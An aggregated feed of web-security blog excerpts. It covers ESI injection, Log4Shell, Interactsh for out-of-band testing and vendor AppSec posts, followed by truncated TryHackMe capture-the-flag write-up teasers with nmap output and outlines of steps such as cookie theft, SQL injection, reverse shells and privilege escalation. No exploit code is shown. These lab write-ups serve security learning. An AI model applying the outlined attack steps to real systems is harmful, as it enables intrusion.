    🔍 Introduction ESIi stands for ESI (Edge Side Include) Injection and refers to an injection attack against that markup in environments that use ESI. ESI, short for Edge Side Include, is a simple markup language used to define web page components for the dynamic assembly and delivery of web applications at the Edge of the internet. It is a standard tag set for page assembly, used in structures such as web caches and load balancers. Within HTML code, ESI appears as tags like the ones below, and is processed in advance by a cache server or similar component that can handle ESI before the response body is passed on to the web browser.

  • Open

    Apache Log4j 2, Flexera and you
    By now, you’ve probably learned of Apache Log4j 2. As reported across the web, there is the recently disclosed CVE-2021-44228 vulnerability in Apache Log4j 2 (widely referred to as Log4Shell) affecting organizations far and wide. This is a critical vulnerability in Apache Log4j 2, impacting versions from 2.0-beta9 to 2.14.1. And now you’ve likely been asking, “Where is this vulnerability within my own IT ecosystem, and how do I mitigate it if necessary?” Flexera is helping work through the issue with our customers by ensuring immediate visibility of the impact of this and other vulnerabilities within their IT estate. Flexera…

  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )

  • Open

    Self-hosted Interactsh for private OOB testing
    This weekend the internet is truly on fire because of log4shell. Now security staff will be responding and scanning their assets, and the representative identification method, OOB (Out-Of-Band), can be tested conveniently using well-known services (ZAP OAST, Burpsuite collaborator, Interactsh, etc.), but this ultimately leaves the IP of the server that produced the callback with an external party, creating a point where information about the company or group operating that service could be obtained. (Not a great picture) So today I'd like to talk about how to build and use a separate interactsh server, using a VPC and DNS glue records, so that OOB can be tested privately.

  • Open

    Log4shell: the internet around the world is on fire 🔥 (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)
    Yes, just yesterday (2021-12-10) an RCE 0-day vulnerability was disclosed in log4j2, Java's logging package. If a service or application can merely write logs, an attack is possible in any environment, and since the risk is RCE the whole world is really on fire. (Haha, my DMs are exploding too. Not going to look......) Work comes first, so yesterday I focused on response and am sharing this post a day late. Where... actually it's not over yet... Afterwards there were additional items, CVE-2021-45046 and CVE-2021-45105, to respond to, so from the initial disclosure on Friday through the following week was hectic. Anyway, my respect to all the security engineers, developers, DevOps and everyone else who suffered through this incident 👏🏼
    Browser addons for web hackers
    Do you use browser addons a lot during security testing? I once installed a huge number of them, but now I seem to keep it under 5. Today I'd like to introduce addons that are useful in security testing and share how my usage has changed. TLDR Name Firefox Chrome 😎 Darkreader Firefox Addons Chrome store 🎩 Eval Villian Firefox Addons, Github 🖥 postMessage-tracker Github 🍪 Cookie-quick-manager Firefox Addons, Github 🍪 Edit-This-Cookie Chrome store, Github 🗑 Clear cache Firefox Addons, Github Chrome store 👩🏽‍💻 JWT Debugger (Github) Firefox Addons Chrome store Changes: I used to use many browser addons.

  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post shows how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )

  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    Controlling ZAP's Root CA via the API and CLI arguments
    A new addon has been added to ZAP. With this addon, ZAP's certificate, i.e. the Root CA, can be controlled through the API or the CLI. Using it, certificate handling becomes a bit easier when running in daemon mode or in CI/CD pipelines. Today, let's look at the Network addon, which lets you handle ZAP's Root CA certificate easily through API/CLI arguments, and how it works 🚀 Network addon: The Network addon is not an addon with special features; it was added to support ZAP's certificate handling.

  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo. READ MORE  ( 2 min )

  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10. READ MORE  ( 6 min )

  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle. READ MORE  ( 6 min )

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows. READ MORE  ( 3 min )

  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments. READ MORE  ( 4 min )

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.  ( 2 min )

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.  ( 2 min )

  • Open

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture. That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly. “If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

  • Open

    TryHackMe > Unbaked Pie
    Don’t over-bake your pie! Please allow 5 minutes for this instance to fully deploy before attacking. This VM was developed in collaboration with @ch4rm, thanks to him for the foothold and privilege escalation ideas. Contents 1 User Flag 1.1 Services 1.2 Django application 1.3 Pickle in the search 1.4 Exploit 1.5 Evade docker 1.6 Database 1.7 Brute force ramsey’s SSH account 1.8 Ramsey’s flag 2 Root Flag 2.1 Lateral move (ramsey -> oliver) 2.2 Privilege escalation User Flag Services Running Nmap will only reveal 1 open port: PORT STATE SERVICE VERSION 5003/tcp open filemaker? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Sat, 05 Jun 2021 05:28:13 GMT | Server: WSGIServer/0.2 CPython/3.8.6…

  • Open

    TryHackMe > Cooctus Stories
    This room is about the Cooctus Clan. Previously on Cooctus Tracker Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01) Present times Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it’s your objective to uncover their plans. Note: A stable shell is recommended, so try and SSH into users when possible. Con…
    TryHackMe > VulnNet Roasted
    VulnNet Entertainment quickly deployed another management instance on their very broad network… VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing. Difficulty: Easy Operating System: Windows This is a much simpler machine, do not overthink. You can do it by following common methodologies. Note: It might take up to 6 minutes for this machine to fully boot. Author: TheCyb3rW0lf Discord: TheCyb3rW0lf#8594 Icon made by DinosoftLabs from www.flaticon.com Contents 1 What is the user flag? (Desktop.txt) 1.1 Services 1.2 Samba 1.3 Find users 1.4 Find users without K…

  • Open

    TryHackMe > VulnNet Internal
    VulnNet Entertainment learns from its mistakes, and now they have something new for you… VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings. Difficulty: Easy/Medium Operating System: Linux This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags. Note: It might take …

  • Open

    TryHackMe > toc2
    It’s a setup... Can you get the flags in time? I have a theory that the truth is never told during the nine-to-five hours. - Hunter S. Thompson Contents 1 Find and retrieve the user.txt flag 1.1 Services 1.2 CMS information 1.3 CMS Made Simple / Reverse Shell 1.4 User flag 2 Escalate your privileges and acquire root.txt 2.1 Lateral move (www-data -> frank) 2.2 The readcreds binary 2.3 Race condition 2.4 Root flag Find and retrieve the user.txt flag Services Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA) | 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA) …

  • Open

    TryHackMe > The Marketplace
    Can you take over The Marketplace’s infrastructure? The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team have been working on. He said it still has a few bugs he and his team need to iron out. Can you take advantage of this and will you be able to gain root access on his server? Contents 1 What is flag 1? 1.1 Services 1.2 Web application 1.3 Token cookie 1.4 XSS vulnerability 1.5 Stealing the admin cookie 2 What is flag 2? (User.txt) 2.1 SQLi vulnerability 2.2 Exploit the SQL injection 2.2.1 Database and tables 2.2.2 Users table 2.2.3 Messages table 2.3 Connect as jake 3 What is flag 3? (Root.txt) 3.1 Lateral move (jake -> michael) 3.…

  • Open

    TryHackMe > Debug
    Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Contents 1 User flag 1.1 Open ports 1.2 Web enumeration 1.3 The index.php.bak file 1.4 PHP serialization exploit 1.5 James password 1.6 User flag 2 Root flag 2.1 Message from root 2.2 The motd service 2.3 Reverse shell and root flag User flag Open ports Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA) | 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA) |_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519) 80/tcp open http …

  • Open

    TryHackMe > En-pass
    Get what you can’t. Think-out-of-the-box Contents 1 Name The Path. 1.1 Enumeration (1st level) 1.2 The zip directory 1.3 The web directory 2 What is the user flag? 2.1 SSH private key 2.2 The reg.php page 2.3 403 Fuzzing 2.4 SSH Connection 3 What is the root flag? 3.1 Cronjob 3.2 The script 3.3 Exploit 3.4 Root shell Name The Path. Nmap detects 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA) | 256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA) |_ 256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (ED25519) 8001/tcp open http Apache httpd 2.4.18 ((…

  • Open

    TryHackMe > Wekor
    CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this ! This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine. Feel free to ask any questions…It’s okay to be confused in some parts of the box ;) Just a quick note, Please use the domain wekor.thm as it could be useful later on in the box ;) Contents 1 User flag 1.1 Nmap scan 1.2 Robots.txt 1.3 SQL Injection 1.4 Wordpress credentials 1.5 Wordpress 1.6 Reverse Shell 1.7 Lateral move (www-data -> Orka) 1.8 User flag 2 Root flag 2.1 O…

  • Open

    TryHackMe > Bookstore
    A Beginner level box with basic web enumeration and REST API Fuzzing. Contents 1 User flag 1.1 Port 80 1.2 Port 5000 1.3 Fuzzing the API (v1) 1.4 User flag 2 Root flag 2.1 Console 2.2 Reverse Engineering (try-harder) 2.3 Root shell User flag Nmap discovers 3 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA) | 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA) |_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Book Store 5000/tcp open http Wer…
2023-02-19T01:42:04.305Z osmosfeed 1.15.1